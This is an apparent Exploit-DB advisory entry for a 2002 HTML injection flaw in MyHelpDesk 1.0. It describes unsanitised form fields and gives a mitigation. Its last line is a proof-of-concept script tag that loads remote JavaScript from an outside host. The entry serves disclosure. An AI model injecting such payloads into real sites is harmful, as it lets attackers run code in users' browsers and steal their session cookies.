MyHelpDesk HTML Injection Vulnerability

vendor:

MyHelpDesk

by:

Alper

7.5

CVSS

HIGH

HTML Injection

CWE

Product Name: MyHelpDesk

Affected Version From: MyHelpDesk 1.0

Affected Version To: MyHelpDesk 1.0

Patch Exists: NO

Related CWE: N/A

CPE: MyHelpDesk

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

MyHelpDesk HTML Injection Vulnerability

MyHelpDesk does not properly sanitize HTML tags from form fields. Attackers may pass arbitrary HTML and script code through the unsanitized form fields or through parameters specified via URL. The attacker-supplied HTML code will be executed by the web client of users who visit such pages, in the security context of the site running the vulnerable software. This may potentially be exploited to hijack web content or steal cookie-based authentication credentials from legitimate users.

Mitigation:

Input validation should be used to ensure that user-supplied data does not contain malicious HTML or script code.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4967/info

It has been reported that MyHelpDesk is vulnerable to HTML injection attacks.

MyHelpDesk does not properly sanitize HTML tags from form fields. Attackers may pass arbitrary HTML and script code through the unsanitized form fields or through parameters specified via URL. The attacker-supplied HTML code will be executed by the web client of users who visit such pages, in the security context of the site running the vulnerable software.

This may potentially be exploited to hijack web content or steal cookie-based authentication credentials from legitimate users.

&lt;script src="http://forum.olympos.org/f.js">Alper&lt;/script&gt;